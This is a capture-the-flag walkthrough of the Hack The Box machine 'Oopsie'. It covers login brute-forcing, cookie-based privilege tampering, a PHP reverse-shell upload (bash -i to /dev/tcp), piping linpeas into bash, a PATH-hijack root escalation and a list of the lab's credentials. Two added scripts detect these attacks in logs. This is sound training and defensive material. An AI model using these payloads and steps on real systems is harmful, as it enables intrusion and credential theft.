Continuing the Intro boxes with my local infosec group, the second box on the list is Oopsie. It's listed as an Easy box, but people starting out who aren't familiar with web apps could get lost, especially figuring out the initial login foothold. Its IP is 10.10.10.28 and you need the login pack for OpenVPN to reach it; you can't reach it with your normal one.
Recon
First we kick off an Nmap scan of all ports, then check service versions and run the default scripts against the ports found.
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.28 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -sC -sV -p$ports 10.10.10.28
We find TCP ports 22 and 80 open.
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxxctowbmnTyFHK0XREQShvlp32DNZ7TS9fp1pTxwt4urebfFSitu4cF2dgTlCyVI6o+bxVLuWvhbKqUNpl/9BCv/1DFEDmbbygvwwcONVx5BtcpO/4ubylZXmzWkC6neyGaQjmzVJFMeRTTUsNkcMgpkTJXSpcuNZTknnQu/SSUC5ZUNPdzgNkHcobGhHNoaJC2StrcFwvcg2ftx6b+wEap6jWbLId8UfJk0OFCHZWZI/SubDzjx3030ZCacC1Sb61/p4Cz9MvLL5qPYcEm8A14uU9pTUfDvhin1KAEEDCSCS3bnvtlw1V7SyF/tqtzPNsmdqG2wKXUb6PLyllU/L
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLaHbfbieD7gNSibdzPXBW7/NO05J48DoR4Riz65jUkMsMhI+m3mHjowOPQISgaB8VmT/kUggapZt/iksoOn2Ig=
| 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKLh0LONi0YmlZbqc960WnEcjI1XJTP8Li2KiUt5pmkk
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux
Since port 80 is open, we immediately run feroxbuster in another tab to look for web directories.
feroxbuster
feroxbuster --url http://10.10.10.28 --scan-limit 3 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
We get a hit on http://10.10.10.28/cdn-cgi/login, and when we visit the page we see an HTTP login form.
Nikto
Another tool you can use for web scanning is Nikto, which performs a battery of tests against web servers. As you can see below, Nikto also found the /cdn-cgi/login/ directory.
Other tools
- GoBuster
gobuster dir -u http://10.10.10.28 -w /usr/share/wordlists/dirb/common.txt -e
- wfuzz
wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.28/FUZZ --hc 404
- ffuf
ffuf -u http://10.10.10.28/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -mc 200
- dirb and DirBuster are also good choices, especially DirBuster if you are more comfortable with a GUI tool.
Also, if we had had Burp Suite running we could have saved time: we would have seen a .js script being called that would have hinted the directory was there.
BurpSuite
Speaking of Burp Suite, you can attempt to brute-force login pages with it, but the Community edition throttles Intruder to slower speeds, which is a pain in the ass with huge wordlists. With Burp running, send the request to Intruder, then in the Intruder->Positions tab choose the password as the target.
Paste some passwords into the Intruder->Payloads tab, go back to Positions and start the attack.
You should see a successful result. For brevity we treat these boxes as belonging to one target company and reuse the password from the previous box, Archetype: MEGACORP_4dm1n!!
Hydra
For simple HTTP form POSTs, another tool you can use is the multi-protocol cracking tool Hydra, which is included with Kali. We go through the same process to figure out the syntax needed to crack the password. Without Burp available, you could open DevTools in Firefox and check the Network tab while attempting to log in, to see what kind of request was sent so we can reproduce it with Hydra.
Hydra can flag success or failure on strings in the response. Normally a web login form gives feedback saying the user or password was bad, so instead of S=302 we could have used something like F=invalid, or whatever error text the page shows. This login page shows no errors, so we use the 302 HTTP response code as the success condition, since a valid login usually redirects you to the next page. The ^USER^ and ^PASS^ placeholders are filled from each line of the user and password files; since we can assume the username is admin we use the lowercase -l for a single user (if we had a user list to cycle through we could have used -L users.txt). Since this is a simple HTTP POST form we use the http-post-form module along with the URL. Again for brevity we used the already known password from the last box; otherwise a good wordlist may be used, but in real-world scenarios you could face lockouts or CAPTCHAs when brute-forcing logins and might trigger alerts to the web admin that someone is trying to brute-force.
hydra -l admin -P passwords.txt 10.10.10.28 http-post-form "/cdn-cgi/login/index.php?:username=^USER^&password=^PASS^:S=302"
patator
Patator is another multi-protocol cracker. We can do a similar attack and then filter out the 200 HTTP responses so we only see the 302 redirect that marks a valid login.
patator http_fuzz url=http://10.10.10.28/cdn-cgi/login/index.php method=POST body='username=admin&password=FILE0' 0=passwords.txt -x ignore:code=200
Super admin
So now that we are logged in and look around the links inside the panel, we notice the uploads page needs super admin rights. When users log in there is normally a cookie or a user ID associated with the session. So when we log into Oopsie and go to the uploads page, in the URL bar we see that our user id=1. We want to swap that number for a different one to see if we can get associated with a different account ID that may give us different privileges. Since Burp does well with adjusting and attacking parameters, we send this request to Intruder again.
In Burp you can set a sequential number payload to iterate from 1 to 50, so let's try that and start the attack.
We can see from the results that the number 30 has a different response size than most of the others.
Let's mimic this with wfuzz. In bash we could create a wordlist containing the numbers 1 through 50 with printf '%s\n' {1..50} > numbers.txt, but there's no need: wfuzz includes a simple number iterator, so we just need to supply the URL and the cookie of our admin user.
wfuzz -c -z range,1-50 -H 'Cookie: user=34322; role=admin' "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=FUZZ"
As you can see, there are a lot of responses with the same length, 3595, so let's hide those using --hh 3595.
wfuzz -c -z range,1-50 -H 'Cookie: user=34322; role=admin' --hh 3595 "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=FUZZ"
That gives us fewer results to go through. We can then test each one with curl and grep for super; you'll see there is an ID in the returned HTML. Let's open Firefox DevTools, change our user cookie value to 86575 and refresh the page. When we go to the uploads link you'll see we now have privileges to upload, so let's go ahead and upload a simple PHP reverse shell.
curl -s --cookie-jar cookies.txt -H $'Cookie: user=34322; role=admin' 'http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=30' | grep super
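Seen from the server side, both of the techniques above leave a very recognisable trail in the Apache access log: the Hydra/Patator run is a burst of POSTs to /cdn-cgi/login/index.php from one IP that all get the form back (200) until one gets the redirect (302), and the Burp/wfuzz sweep is one client asking admin.php?content=accounts for dozens of different id values in a row. The script below is an added example, not part of the original writeup, that parses constructed combined-format log lines (the IPs, timestamps and sizes are made up; only the two URL paths come from the box) and flags both patterns. The thresholds and window are assumptions you would tune to your own traffic.

```python
import re
import urllib.parse
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" access log: client IP, timestamp, request line, status, response size.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The two endpoints from the writeup: the login form and the accounts page that takes id=.
LOGIN_PATH = "/cdn-cgi/login/index.php"
ACCOUNTS_PATH = "/cdn-cgi/login/admin.php"


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def detect_login_bruteforce(lines, threshold=10, window_s=60):
    """Flag IPs that POST to the login form at least `threshold` times within `window_s`
    seconds. A 302 among the attempts means one guess redirected (hydra's S=302 condition)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith(LOGIN_PATH):
            per_ip[rec["ip"]].append(rec)
    findings = {}
    for ip, reqs in per_ip.items():
        reqs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(reqs)):  # sliding time window over this IP's attempts
            while (reqs[end]["ts"] - reqs[start]["ts"]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                findings[ip] = {
                    "attempts": len(reqs),
                    "succeeded": any(r["status"] == 302 for r in reqs),
                }
                break
    return findings


def detect_id_enumeration(lines, threshold=5):
    """Flag IPs that request content=accounts with at least `threshold` distinct id values,
    which is what a Burp Intruder or wfuzz range,1-50 sweep looks like from the server."""
    ids_seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if not rec or not rec["path"].startswith(ACCOUNTS_PATH):
            continue
        params = urllib.parse.parse_qs(urllib.parse.urlsplit(rec["path"]).query)
        if params.get("content") == ["accounts"] and "id" in params:
            ids_seen[rec["ip"]].add(params["id"][0])
    return {ip: len(ids) for ip, ids in ids_seen.items() if len(ids) >= threshold}


# --- constructed sample log (not real traffic from the box) ---------------------------
_BASE = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)


def _line(ip, secs, method, path, status, size):
    ts = (_BASE + timedelta(seconds=secs)).strftime(TS_FMT)
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} {size} "-" "Mozilla/5.0"'


SAMPLE_LOG = (
    # 12 failed guesses (form re-rendered, 200) then a hit (302) from one attacker IP
    [_line("10.10.14.5", s, "POST", LOGIN_PATH, 200, 1234) for s in range(12)]
    + [_line("10.10.14.5", 12, "POST", LOGIN_PATH, 302, 0)]
    # a normal user logging in once
    + [_line("10.10.14.9", 5, "POST", LOGIN_PATH, 302, 0)]
    # the attacker sweeping id=1..8 (same 3595-byte page) and id=30 (a different account)
    + [_line("10.10.14.5", 20 + i, "GET", f"{ACCOUNTS_PATH}?content=accounts&id={i}", 200, 3595)
       for i in range(1, 9)]
    + [_line("10.10.14.5", 29, "GET", f"{ACCOUNTS_PATH}?content=accounts&id=30", 200, 3731)]
    # the normal user viewing their own account once
    + [_line("10.10.14.9", 30, "GET", f"{ACCOUNTS_PATH}?content=accounts&id=1", 200, 3595)]
)

if __name__ == "__main__":
    print("login brute force:", detect_login_bruteforce(SAMPLE_LOG))
    print("id enumeration:", detect_id_enumeration(SAMPLE_LOG))
```

Run against the constructed sample it reports 10.10.14.5 for both patterns and leaves 10.10.14.9 alone. The real fixes are on the application side (rate limiting and lockout on the form, and checking that the requested id belongs to the logged-in session rather than trusting a cookie that says role=admin), but this is the kind of query you would point at the same log if you wanted to know whether anyone had already tried.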
Put this in a file and name it rev.php (use ifconfig tun0 to get your HTB VPN IP):
<?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.15.93/9000 0>&1'");
Open a netcat listener on port 9000:
nc -lvnp 9000
When we upload our file we don't get any feedback about where it is stored. Luckily, in our earlier recon we saw the /uploads directory, so let's try navigating to http://10.10.10.28/uploads/rev.php. Lucky for us, our guess paid off; sometimes it's difficult to know the upload directory, and sometimes even the filename gets randomized or hashed.
So now that we have our shell, let's upgrade to a better TTY shell using python3:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Looking around in the www directory we find a db.php file which holds some credentials 🙂 Let's hope robert is lazy and reuses his password for SSH.
USER
We find that these are indeed robert's SSH credentials too, so we grab user.txt.
Then we do some recon using linpeas to get some situational awareness. Let's download linpeas, start a Python HTTP server to host it, and fetch it from the victim. From the attack box:
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh && sudo python3 -m http.server 80
From victim:
curl http://10.10.15.93/linpeas.sh | bash
We don't find much useful information, although if you weren't paying attention you might have missed the bugtracker group robert is in. So let's figure out what he can do as a member of that group.
We see that robert can execute a binary in the bin folder called bugtracker. When we execute it, it asks for a number. I tried a few, then tried 1 and it finally returned some data. We run strings on the file to see if we can get any hints about what it's doing:
strings /usr/bin/bugtracker
We see that it's just using cat to get the contents of a file in the /root/report directory. Since it's not using the full absolute path to cat, i.e. /bin/cat, we can create an evil cat in our working directory. When the bugtracker program runs cat, the shell searches PATH in order, so with our home directory prepended to PATH our cat is found first.
export PATH=~:$PATH
echo '/bin/bash' > cat
chmod +x cat
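To make the mechanism concrete, here is an added example (not from the writeup) that simulates the lookup the shell performs when bugtracker runs a bare cat, and a small check that answers the question an auditor would ask of any setuid binary: is there a directory the caller can write to that is searched before the directory really holding the command? The filesystem, writable directories and PATH values below are constructed stand-ins for the box; the fix the simulation points at is the one the writeup names, invoking /bin/cat by absolute path (or, in a setuid program, resetting PATH to a fixed value before calling anything).

```python
import os


def resolve_command(command, path_env, executables):
    """Return the file a command name resolves to, mimicking the lookup the shell (and
    libc's system(), which is what a bare `cat` in a C program ends up calling) performs.
    `executables` is a constructed set of absolute paths standing in for the filesystem."""
    if "/" in command:
        # Any slash means "this path, exactly": PATH is never consulted.
        return command if command in executables else None
    for directory in path_env.split(":"):
        candidate = os.path.join(directory or ".", command)  # empty entry means cwd
        if candidate in executables:
            return candidate
    return None


def path_hijack_risk(command, path_env, executables, writable_dirs):
    """Return the first PATH entry the caller can write to that is searched before the
    directory really holding `command`; None means the lookup cannot be redirected."""
    if "/" in command:
        return None
    for directory in path_env.split(":"):
        if directory in writable_dirs:
            return directory
        if os.path.join(directory or ".", command) in executables:
            return None
    return None


# Constructed stand-in for the box: system cat plus a user-controlled cat in robert's home.
FS = {"/bin/cat", "/bin/bash", "/home/robert/cat"}
WRITABLE = {"/home/robert", "/tmp"}
PATH_DEFAULT = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PATH_HIJACKED = "/home/robert:" + PATH_DEFAULT   # what `export PATH=~:$PATH` produces

if __name__ == "__main__":
    for cmd in ("cat", "/bin/cat"):
        for label, path in (("default", PATH_DEFAULT), ("hijacked", PATH_HIJACKED)):
            print(f"{cmd:9} with {label:8} PATH -> {resolve_command(cmd, path, FS)}"
                  f"  risk: {path_hijack_risk(cmd, path, FS, WRITABLE)}")
```

The output shows the two halves of the story: a bare cat goes to /home/robert/cat as soon as the home directory leads PATH, while /bin/cat resolves the same way under either PATH and path_hijack_risk reports nothing for it. The same check run over the strings output of a setuid binary (every line that starts with a bare command name) is a quick way to spot this class of bug before someone else does.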
ROOT
Well, it looks like we don't have a root.txt yet :/ So, starting with more recon, let's check out the /root folder.
Looking at the file, I noticed it looked like it had contents, so I figured I could use xxd to get the hex output of the file, and I found the flag :). Then I had my aha moment: I wasn't using the full path for cat either…
But looking further in the root directory, we find a .config folder that has a filezilla.xml config with more credentials. Much like the last box, we're probably going to use these credentials on the next box…
LOOT
- admin:MEGACORP_4dm1n!!
- robert:M3g4C0rpUs3r!
- ftpuser:mc@F1l3ZilL4